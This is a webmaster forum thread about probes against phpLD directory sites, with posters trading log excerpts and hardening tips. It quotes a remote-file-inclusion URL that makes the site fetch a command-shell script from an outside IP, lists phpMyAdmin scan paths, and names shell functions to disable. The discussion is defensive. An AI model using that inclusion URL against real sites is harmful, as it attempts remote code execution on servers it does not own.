Hi, seen loads of threads with hacked directories, so i ensure i have proper safe guards in place, instant emails where a out-of-place url is typed! and full local backup and database backup cron jobs running on the hour! yeah ....somewhat edgy here this URL came today! http: // nic. dir .vc/look. php?id=http://211.155.235.169 /sewam / cmd.txt so.... please do ban the IP, Regards, M. PS: http://wq.apnic.net/apnic-bin/whois.pl?searchtext=211.155.235.169 my advise, against this kind of an attack, first get in touch your coder and ask if the following functions are being used, if not ask your host to disable them, > exec > shell_exec > passthru
i didnt get hacked, ....just attacked someone was snooping around! so a little heads up for the IP address! yes... nothing is 100% secure,.... but the way phpLD is built up it is very secure, but still , one has to watch out for these guys, a**hole crackers are always lookin for security holes! M.
Everything gets probed for security holes, constantly. Phpld is probably the biggest directory target for hackers, simply because it's the most used. Always run the latest version and you should be safer. Take a look at your 404 stats: this should give you an idea of how many bots are looking for things you might have installed, in the hope you have some outdated code they can use to cause mayhem, steal data, or just turn your server into a spam zombie. I think most 404s are caused by bots rather than people.
Indeed, I've lost count on the number of variations for 'phpMyAdmin'... here are just a few from the past hour! /phpMyAdmin-2.5.5-rc1/main.php /phpMyAdmin-2.6.1-rc1/main.php /phpMyAdmin-2.6.1-pl2/main.php /phpMyAdmin-2.5.5/main.php /phpMyAdmin-2.8.0.4/main.php /phpMyAdmin-2.8.0/main.php /phpMyAdmin-2.6.2/main.php /phpMyAdmin-2.6.1-pl3/main.php /phpMyAdmin-2.5.5-pl1/main.php /phpMyAdmin-2.6.4/main.php /phpMyAdmin-2.8.1-rc1/main.php /phpMyAdmin-2.7.0-pl2/main.php /phpMyAdmin-2.6.0-rc2/main.php /phpMyAdmin-2.8.0-rc2/main.php /phpMyAdmin-2.8.2/main.php
As Obelia rightly pointed out 404 Pages, i am using phpLD 2.1.2,....(modded beyond the possibility of an upgrade!!!), so i have my own 404 pages u could use flat files to keep track of 404 pages, the IP was in the querystring, ....and amazingly the file is still there! http://211.155.235.169 /sewam / cmd.txt perhaps the guy is busy hitting various people with the same file! Regards, M.
it's not only PHPLD. Installations that are commonly used around the net are prime for a quick hack attack, like WordPress or Gallery2.
Hey, thanks for the heads up on the IP... I'm not sure if it was a hacking attempt, but under "site title", someone tried to enter something like: into my directory the other day... Do they think I don't review the submissions?
That possibly was a hacking attempt, checking to see if they could do an SQL injection on your form. Or it could be a test to see whether you're publishing things without moderation: the spammer will hit loads of websites with these form entries, then search for the odd-looking text. Anywhere it comes up, he will return to spam into oblivion.
now this guy has a BOT working!!! At URL : nic.dir.vc/index.php?page=http://211.155.235.169/sewam/cmd.txt? Referrer : UA : libwww-perl/5.65 (im assuming libwww-perl/5.65 is a bot made in perl ) how much extra time do people have?